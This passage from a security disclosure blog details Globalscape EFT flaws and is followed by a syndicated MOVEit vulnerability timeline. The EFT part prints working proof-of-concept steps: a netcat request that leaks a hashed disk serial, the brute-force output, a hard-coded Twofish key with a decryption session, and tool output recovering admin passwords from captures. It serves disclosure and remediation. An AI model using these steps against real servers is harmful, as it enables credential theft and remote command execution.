We can look at the call stack to verify that it does indeed crash by recursing infinitely and exhausting all stack memory:

0:096> k
 # Child-SP          RetAddr               Call Site
00 000000a7`cb583ff0 00007ff8`1d63f5a6     ntdll!RtlpHpAllocVirtBlockCommitFirst+0x31
01 000000a7`cb584060 00007ff8`1d63c4f9     ntdll!RtlpAllocateHeap+0x1246
02 000000a7`cb584230 00007ff8`1abeffa6     ntdll!RtlpAllocateHeapInternal+0x6c9
*** WARNING: Unable to verify checksum for C:\Program Files\Globalscape\EFT Server\cftpstes.exe
03 000000a7`cb584340 00007ff6`d486b217     ucrtbase!_malloc_base+0x36
04 000000a7`cb584370 00007ff6`d3de5803     cftpstes!OPENSSL_Applink+0xb35787
05 000000a7`cb5843a0 00007ff6`d43e17b4     cftpstes!OPENSSL_Applink+0xafd73
06 000000a7`cb5843d0 00007ff6`d4011660     cftpstes!OPENSSL_Applink+0x6abd24
07 000000a7`cb584400 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbbd0
08 000000a7`cb5844d0 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbc0f
09 000000a7`cb5845a0 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbc0f
0a 000000a7`cb584670 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbc0f
0b 000000a7`cb584740 00007ff6`d401169f     cftpstes!OPENSSL_Applink+0x2dbc0f
......

While the exploit itself is interesting from a development and mathematics perspective, this is ultimately a denial of service, and has no possibility of code execution or other security consequences.

CVE-2023-2991—Hard Drive Serial Number Disclosure

The hard drive serial number of the server hosting a Globalscape EFT instance can be derived by requesting a TER ("trial extension request") identifier. Presumably, this is an identifier used for uniquely identifying licensed hosts. As of this disclosure, this issue is not fixed, but is also minor enough to disclose (The vendor has disclosed it as a KB here). We developed a proof of concept that you can download here.

If we send a blank (header-only) message of type 0x138 to the administration port, it returns a lightly obfuscated base64 string in a field called HASH, and that is internally called a "TER":

$ echo -ne '\x08\x00\x00\x00\x38\x01\x00\x00' | nc 172.16.166.170 1100 | hexdump -C
[...]
00000020  [...]                                84 00 00 00  |            ....|
00000030  38 01 00 00 48 41 53 48  04 00 00 00 32 00 00 00  |8...HASH....2...|
00000040  2b 00 6b 00 34 00 56 00  47 00 30 00 41 00 54 00  |+.k.4.V.G.0.A.T.|
00000050  35 00 43 00 55 00 30 00  34 00 42 00 44 00 36 00  |5.C.U.0.4.B.D.6.|
00000060  30 00 5a 00 57 00 35 00  76 00 6d 00 30 00 47 00  |0.Z.W.5.v.m.0.G.|
00000070  4d 00 34 00 43 00 4a 00  57 00 70 00 6d 00 65 00  |M.4.C.J.W.p.m.e.|
00000080  4c 00 53 00 2f 00 51 00  38 00 46 00 46 00 69 00  |L.S./.Q.8.F.F.i.|
00000090  30 00 6a 00 50 00 50 00  34 00 43 00 74 00 78 00  |0.j.P.P.4.C.t.x.|
000000a0  67 00 3d 00 45 52 52 52  01 00 00 00 00 00 00 00  |g.=.ERRR........|

The actual string from the HASH field is +k4VG0AT5CU04BD60ZW5vm0GM4CJWpmeLS/Q8FFi0jPP4Ctxg=, which does not correctly decode as base64:

$ echo -ne '+k4VG0AT5CU04BD60ZW5vm0GM4CJWpmeLS/Q8FFi0jPP4Ctxg=' | base64 -d
�N�%4��ѕ��m3��Z��-/��Qb�3��+qbase64: invalid input

We reverse engineered the function that generates that value, and determined that six characters—0, 8, 0, 0, 0, and 0—are inserted into the base64 string at the offsets 14, 33, 5, 38, 21, and 11, in that order (presumably as obfuscation). We can undo that process by removing those six characters in the opposite order, which leaves us with the new base64 string +k4VGAT5CU4BD6ZW5vmGM4CJWpmeLS/QFFijPP4Ctxg=. That fixed string does successfully decode as base64, into a 256-bit string:

$ echo -ne '+k4VGAT5CU4BD6ZW5vmGM4CJWpmeLS/QFFijPP4Ctxg=' | base64 -d | hexdump -C
00000000  fa 4e 15 18 04 f9 09 4e  01 0f a6 56 e6 f9 86 33  |.N.....N...V...3|                                                     
00000010  80 89 5a 99 9e 2d 2f d0  14 58 a3 3c fe 02 b7 18  |..Z..-/..X.<....|  

That string is the SHA256 of the hard drive’s serial number. On my server, the serial number is 418934929, which means we can calculate the SHA256 digest ourselves and validate that it matches the string the server returned:

$ echo -ne '418934929' | sha256sum
fa4e151804f9094e010fa656e6f9863380895a999e2d2fd01458a33cfe02b718  -

Since the space of possible serial numbers is small, exhaustively brute forcing that integer value is possible in only a few minutes, even on a laptop:

$ time ruby ./request-hdd-serial.rb
Sending: ["0800000038010000"]                                                                                                      
Received TER:                                                                                                                      
{:length=>132,                                                                                                                     
 :msgid=>312,                                                                                                                      
 :args=>                                     
  {"HASH"=>                                  
    {:type=>:string,
     :length=>50,
     :data=>"+k4VG0AT5CU04BD60ZW5vm0GM4CJWpmeLS/Q8FFi0jPP4Ctxg="},
   "ERRR"=>{:type=>:int, :value=>0}}}
SHA256 of serial = fa4e151804f9094e010fa656e6f9863380895a999e2d2fd01458a33cfe02b718

Trying 0...
Trying 1048576...
Trying 2097152...
Trying 3145728...
Trying 4194304...
[...]
Trying 417333248...
Trying 418381824...
Found the serial: 418934929

________________________________________________________
Executed in  431.80 secs    fish           external
   usr time  426.37 secs    0.00 micros  426.37 secs
   sys time    0.07 secs  864.00 micros    0.07 secs

Plaintext-Equivalent Passwords in Network Traffic

By default, the remote administration server does not use SSL. We determined that, while the password transmitted on the wire is encrypted, the encryption key is hard-coded and users’ passwords can be recovered from a packet capture. We developed a tool that will do just that. Although we opted not to assign a CVE to this issue, the vendor has updated the default SSL setting in future versions and has published an advisory.

As noted above, administrators can run local Windows commands, which means that a packet capture essentially leads to remote code execution, unless the administrator enables SSL.

Here is an example of a login message that contains an encrypted password:

00000000  5e 00 00 00 01 00 00 00  50 53 57 44 05 00 00 00  |^.......PSWD....|
00000010  24 00 00 00 20 00 00 00  86 40 71 de d2 ea 9e 12  |$... ....@q.....|
00000020  d5 ae 18 40 64 c4 04 ed  c1 08 78 b3 9e c6 4a 57  |[email protected]|
00000030  c6 1d b6 8d 49 24 0b 8b  41 44 4c 4e 05 00 00 00  |....I$..ADLN....|
00000040  0a 00 00 00 fc ff ff ff  72 00 6f 00 6e 00 41 4d  |........r.o.n.AM|
00000050  49 44 05 00 00 00 04 00  00 00 00 00 00 00        |ID............|

It contains three fields: PSWD (password), ADLN (username), and AMID (login type). In our case, we’re only concerned with the encrypted password field (PSWD), which has the value:

\x86\x40\x71\xde\xd2\xea\x9e\x12\xd5\xae\x18\x40\x64\xc4\x04\xed\xc1\x08\x78\xb3\x9e\xc6\x4a\x57\xc6\x1d\xb6\x8d\x49\x24\x0b\x8b

Passwords are encrypted using the Twofish algorithm with a static key (tfgry\0\0\0\0\0\0\0\0\0\0\0) and blank IV. That means that passwords can be fully decrypted off the wire (although casual observers might believe that the encryption has some value). Here’s a demonstration of decrypting that password using the interactive Ruby shell (irb) and the twofish gem:

$ gem install twofish
[...]
$ irb

3.0.2 :001 > require 'twofish'
 => true

3.0.2 :002 > tf = Twofish.new("tfgry\0\0\0\0\0\0\0\0\0\0\0", :padding => :zero_byte, :mode => :cbc)
 => #<Twofish:0x0000000002b23340 [...]>

3.0.2 :003 > tf.iv = "\0" * 16
 => "\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000\u0000" 

3.0.2 :004 > puts (tf.decrypt("\x86\x40\x71\xde\xd2\xea\x9e\x12\xd5\xae\x18\x40\x64\xc4\x04\xed\xc1\x08\x78\xb3\x9e\xc6\x4a\x57\xc6\x1d\xb6\x8d\x49\x24\x0b\x8b") + "\0").force_encoding("UTF-16LE").encode("ASCII-8BIT")
Password1!

We use force_encoding() and encode to convert from UTF-16 to ASCII.

To demonstrate the impact, we wrote a tool that’ll decrypt passwords from a PCAP file:

$ ruby recover-pw.rb all-login-types.pcapng
Found login: ron / MyWindowsPassword (type = "Windows authentication")
Found login: ron / Password1! (type = "Windows authentication")
Found login: ron / testtest (type = "EFT Authentication")
Found login: ron / Password1! (type = "EFT Authentication")
Found login: WIN-PV9OH13IIUB\Administrator / ******** (type = "Currently logged on user")
 NTLMSSP blob: ["400000004e544c4d535350000100000007b208a209000900370000000f000f00280000000a007c4f0000000f57494e2d5056394f48313349495542574f524b47524f5550"]
Found login: WIN-PV9OH13IIUB\Administrator / ******** (type = "Currently logged on user")
 NTLMSSP blob: ["580000004e544c4d535350000300000000000000580000000000000058000000000000005800000000000000580000000000000058000000000000005800000005c288a20a007c4f0000000fc336e05c920cada6821fe04d5709b868"]

Note that NTLM logins use the literal password ********, but also include an additional NTLMSSP blob containing the actual authentication details.

Remediation

These issues are fixed in Fortra Globalscape version 8.1.0.16. We don’t believe these require emergency patches, but since the ultimate consequence is remote code execution, they should be patched in the next planned patch cycle.

Timeline

  • April 2023 – Rapid7 begins researching Globalscape EFT
  • May 10, 2023: Rapid7 reports issues to vendor
  • May 10, 2023: Vendor acknowledgement
  • May 24, 2023: Vendor confirmed the issues
  • May 26, 2023: Rapid7 reserves CVEs
  • May 26 – June 1, 2023: Vendor and Rapid7 clarify additional details
  • June 13, 2023: Rapid7 asks for an update from vendor on patch ETA, proposes July 11 as coordinated disclosure date. Because of a minor misunderstanding, Rapid7 discovers vendor has already released fixes and KBs. Vendor volunteers to pull KBs offline while Rapid7 prepares our own disclosure. Initially, Rapid7 agrees to this.
  • June 14, 2023: Rapid7 asks vendor to republish their KBs in the interest of transparency and effective risk assessment while Rapid7 prepares this disclosure
  • June 20, 2023 – Vendor informs Rapid7 their KBs have been re-published
  • June 22, 2023 – Rapid7 releases this disclosure blog

CVE-2023-34362: MOVEit Vulnerability Timeline of Events

Post Syndicated from Rapid7 original https://blog.rapid7.com/2023/06/14/etr-cve-2023-34362-moveit-vulnerability-timeline-of-events/

CVE-2023-34362: MOVEit Vulnerability Timeline of Events

The following article was written by Drew Burton and Cynthia Wyre.

Rapid7 continues to track the impact of CVE-2023-34362, a critical zero-day vulnerability in Progress Software’s MOVEit Transfer solution. CVE-2023-34362 allows for SQL injection, which can result in unauthorized access to sensitive data, such as passwords, credit card details, or personal user information.

Rapid7 is not currently seeing evidence that commodity or low-skill attackers are exploiting the vulnerability. However, the exploitation of available high-value targets globally across a wide range of org sizes, verticals, and geo-locations indicates that this is a widespread threat. We expect to see a longer list of victims come out as time goes on.

We’ve put together a timeline of events to date for your reference.

MOVEit Timeline

May 27-28: Rapid7 services teams have so far confirmed indicators of compromise and data exfiltration dating back to at least May 27 and May 28, 2023 (respectively).

May 31: Progress Software publishes an advisory on a critical SQL injection vulnerability in their MOVEit Transfer solution.

May 31: Rapid7 begins investigating exploitation of MOVEit Transfer.

June 1: Rapid7 publishes initial analysis of MOVEit Transfer attacks after responding to incidents across multiple customer environments.

June 1: The security community publishes technical details and indicators of compromise.

June 1: Compromises continue; Rapid7 responds to alerts.

June 1: CISA publishes Security Advisory.

June 2: CVE-2023-34362 is assigned to the zero-day vulnerability.

June 2: Mandiant attributes the attack to a threat cluster with unknown motives.

June 2: Velociraptor releases an artifact to detect exploitation of MOVEit File Transfer critical vulnerability.

June 4: Rapid7 publishes a method to identify which data was stolen.

June 4: Nova Scotian government discloses it is investigating privacy breach.

June 5: Microsoft attributes the attack to Lace Tempest, a Cl0p ransomware affiliate that has previously exploited vulnerabilities in other file transfer solutions (e.g., Accellion FTA, Fortra GoAnywhere MFT).

June 5: UK companies BA, BBC, and Boots disclose breaches as victims in MOVEit File Transfer.

June 5: Cl0p ransomware group claims responsibility for the zero-day attack.

June 6: Security firm Huntress releases a video allegedly reproducing the exploit chain.

June 6: The Cl0p ransomware group posts a communication on their leak site demanding that victim organizations contact them by June 14 to negotiate extortion fees in exchange for the deletion of stolen data.

June 7: CISA publishes #StopRansomware Cybersecurity Advisory regarding MOVEit File Transfer Vulnerability CVE-2023-34362.

June 9: Progress Software updates advisory to include a patch for a second MOVEit Transfer Vulnerability, which was uncovered by Huntress during a third-party code review. The vulnerability is later assigned CVE-2023-35036.

June 12: Rapid7 releases a full exploit chain for MOVEit Transfer Vulnerability CVE-2023-34362.

Mitigation

All MOVEit Transfer versions before May 31, 2023 are vulnerable to CVE-2023-34362, and all MOVEit Transfer versions before June 9, 2023 are vulnerable to CVE-2023-35036. As noted above, fixed versions of the software are available, and patches should be applied on an emergency basis.

Patches are available via Progress Software’s CVE-2023-34362 advisory. Additionally, because CVE-2023-34362 is a zero-day vulnerability, Progress Software is advising MOVEit Transfer and MOVEit Cloud customers to check for indicators of unauthorized access over “at least the past 30 days.”

According to the company’s status page, Progress also took the following steps aimed at increasing security monitoring and defending against further exploitation or attack:

  • Developed specific monitoring signatures on Progress’ endpoint protection system.
  • Validated that the newly developed patch corrected the vulnerability.
  • Tested detection rules before finalizing to ensure that notifications are working properly.
  • Engaged outside cybersecurity experts and other incident response professionals to conduct a forensic investigation and assess the extent and scope of the incident.

As noted in the timeline above, Rapid7 has added capabilities across our portfolio that can help users identify and resolve risk from CVE-2023-34362. We have also identified a method to identify exfiltrated data from compromised MOVEit customer environments.

To learn more, check out: Rapid7 Observed Exploitation of Critical MOVEit Transfer Vulnerability